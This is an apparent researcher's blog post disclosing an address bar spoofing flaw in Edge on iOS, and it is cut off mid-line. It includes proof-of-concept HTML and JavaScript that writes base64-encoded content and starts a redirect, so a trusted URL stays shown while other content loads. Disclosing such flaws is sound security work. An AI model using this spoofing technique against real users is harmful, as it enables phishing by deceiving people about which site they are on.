Edge IOS Address Bar Spoof
Hello readers, This post is about edge IOS address bar spoof vulnerability. Address bar spoof vulnerability is an ability to keep legit URL in address bar while loading the content from other domain. This makes user believe that the content is actually served by a legit domain. For example browser is displaying https://www.google.com in address bar or in omni-box while rendering the content from https://www.evil.com Original POC code: test.html <button onclick="window.open('http://lab-nick.codeanyapp.com/test.html')"> Goto-Google </button> test2.html <html> <body> <script> window.onload = function() { var payload = "PGh0bWw+Cjxib2R5Pgo8aDE+QWRkcmVzcyBCYXIgU3B vb2YgQEMwZDNHMzNrPC9oMT4KPC9ib2R5Pgo8L2h0bWw+"; document.write(atob(payload)); window.location =